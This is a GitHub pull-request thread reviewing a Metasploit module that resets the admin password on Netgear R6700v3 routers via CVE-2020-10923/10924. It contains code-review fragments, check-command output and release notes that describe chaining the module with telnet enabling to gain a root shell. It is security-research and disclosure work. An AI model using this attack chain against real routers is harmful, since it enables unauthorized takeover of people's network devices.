R6700v3-V1.0.4.84_10.0.58

2020-06-30 04:01 UTC, pedrib commented
Thanks for the effort @gwillcox-r7, you saved us a lot of time!

2020-06-30 13:38 UTC, gwillcox-r7 commented
@pedrib No problem, happy to help :)

2020-06-30 15:37 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +    fail_with(Failure::Unknown, 'Failed to obtain DeviceInfo:1#GetInfo') unless res && res.code == 200
Going to add a commit in a sec which should resolve this issue.

2020-06-30 15:37 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +msf5 exploit(linux/telnet/netgear_telnetenable) > set interface enxd03745775fdd
Going to close this out as when I wrote this originally, it was with the idea that this was an exploit module. I failed to notice that this is an auxiliary module. I also spoke to @wvu-r7 and some other people internally and I don't think we have a way to chain modules together right now. Apologies for the confusion, this is my fault!

2020-06-30 15:42 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +msf5 exploit(linux/telnet/netgear_telnetenable) > set interface enxd03745775fdd
Closing this as originally I thought this was an exploit module whereas in reality it is an auxiliary module, so its not expected to get a shell. Also I agree that integrating this would be a pain and after speaking to @wvu-r7 and others we don't really have a way to integrate modules neatly. If we do find a way to integrate things neater then we can always improve on this module in the future.

2020-06-30 15:58 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      fail_with(Failure::Unknown, "Unknown firmware version, can't proceed, please contact the authors")
WIll add some code in shortly to make this check a little better in a sec; may require updating the documentation but if that is the case I'll also make sure to update the documentation as well.

2020-06-30 16:07 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +    fail_with(Failure::Unknown, 'Failed to obtain DeviceInfo:1#GetInfo') unless res && res.code == 200
New commit should now add individual options for raising errors depending on whether the target did not respond or whether it responded but with an unexpected response code.

2020-06-30 16:08 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +    end
Will add some code in shortly to make this check a little better in a sec; may require updating the documentation but if that is the case I'll also make sure to update the documentation as well. This is pretty much the same issue as the point below.

2020-06-30 18:18 UTC, gwillcox-r7 commented
Added in a new updated set of check methods I think should solve the original issue I had by using the information from my manual reversing of the firmware. Output should now look something like the following:

```
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check

[*] Target is running firmware version 1.0.4.82
[*] 192.168.1.1:5000 - The target appears to be vulnerable.
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
```

Also fixed up the description to note that the module can only be run once on a router per router reboot as we crash the `upnpd` binary when we run this module, and added some config options to note that the module may crash the targeted service and that it will change the configuration of the target (as we do this to reset the password back to factory defaults).

I also added in some info to the output to denote the `timeout` and `MAC` options for the `exploit/linux/telnet/netgear_telnetenable` module in case people need to supply these to fix issues.

Hopefully these changes should make things a bit more robust and help users detect if their target router is vulnerable or not.

2020-06-30 21:04 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +    end
Fixed with last set of commits.

2020-06-30 21:04 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      fail_with(Failure::Unknown, "Unknown firmware version, can't proceed, please contact the authors")
Fixed with last set of commits.

2020-06-30 21:09 UTC, rdomanski commented
@gwillcox-r7 thanks a lot for your commits. We appreciate your contribution :) I guess now we only wait for the CVE to be assigned.

2020-06-30 21:23 UTC, gwillcox-r7 commented
@rdomanski Doing one last commit to do tidy up for msftidy compliance reasons, but yep after that this should just need the CVE and then its good to merge :)

2020-06-30 21:47 UTC, gwillcox-r7 commented
@rdomanski Woops sorry one last update, had to better state the range of affected versions. Hopefully this change isn't too major. Also updated the firmware links to archive.org links as I realized that vendors tend to take down old firmware after a while.

2020-06-30 22:13 UTC, kernelsmith commented
I'm checking on the CVE statuses

2020-07-01 14:35 UTC, kernelsmith commented
CVE-2020-10923 ZDI-20-703
CVE-2020-10924 ZDI-20-704

2020-07-01 15:42 UTC, gwillcox-r7 commented
Thanks @kernelsmith! Let me get those inserted so long, and check that the rest of the code passes all our checks, then I'll land this PR so long.

2020-07-01 16:02 UTC, gwillcox-r7 approved these changes

2020-07-01 16:55 UTC, gwillcox-r7 commented
@space-r7 Would you be free to take a quick run through the documentation and module and just see if anything looks odd? Would just like a second pair of eyes seeing as I did have to make a number of changes so I'd like to see if there is any errors I might have introduced whilst editing. The module itself works fine so that shouldn't be an issue.

2020-07-01 17:45 UTC, space-r7 reviewed
Looks good to me. Just a couple of potential typos

2020-07-01 17:45 UTC, space-r7 commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass authentication that occurs when network adjacent
```suggestion
using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent
```

2020-07-01 17:45 UTC, space-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +          using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass authentication that occurs when network adjacent
```suggestion
          using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent
```

2020-07-01 17:46 UTC, gwillcox-r7 commented
> Looks good to me. Just a couple of potential typos

Thanks @space-r7 will fix these up so long, appreciate the quick turn around!

2020-07-01 17:48 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass authentication that occurs when network adjacent
Fixed with next commit.

2020-07-01 17:48 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +          using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass authentication that occurs when network adjacent
Fixed with next commit.

2020-07-01 18:30 UTC, gwillcox-r7 commented
Rebasing branch against master to clean up commit history and make it a little cleaner since I had a lot of extra commits that I wanted to squash down. Once this is done I'll merge this in.

2020-07-01 20:02 UTC, rdomanski commented
I tested the module with all the changes on my router. Looks good! Thanks!

2020-07-01 20:02 UTC, merged

2020-07-01 20:13 UTC, gwillcox-r7 commented
# Release Notes
This module adds support for CVE-2020-10923 (ZDI-20-0703) and CVE-2020-10924 (ZDI-20-0704), and allows unauthenticated attackers on the same network as a Netgear R6700v3 router running firmware versions 1.0.4.82 or 1.0.4.84 to reset the password for the `admin` user back to the factory default of `password`. Attackers can then manually change the `admin` user's password and log into it after enabling telnet via the `exploit/linux/telnet/netgear_telnetenable` module, which will grant the attacker a remote shell with `root` privileges. 

It should be noted that whilst this module only supports exploiting firmware versions 1.0.4.82 and 1.0.4.84 , the vulnerability affects versions 1.0.2.62 to 1.0.4.84 of the Netgear R6700 firmware. Users can check if their firmware is one of these vulnerable versions by using the `check` features of this module.

2020-07-01 20:22 UTC, gwillcox-r7 commented
@rdomanski Thanks for retesting, much appreciated and assures me I didn't break anything rebasing this 👍

2020-07-02 04:11 UTC, pedrib commented
Thanks to @gwillcox-r7 and everyone who collaborated in this module!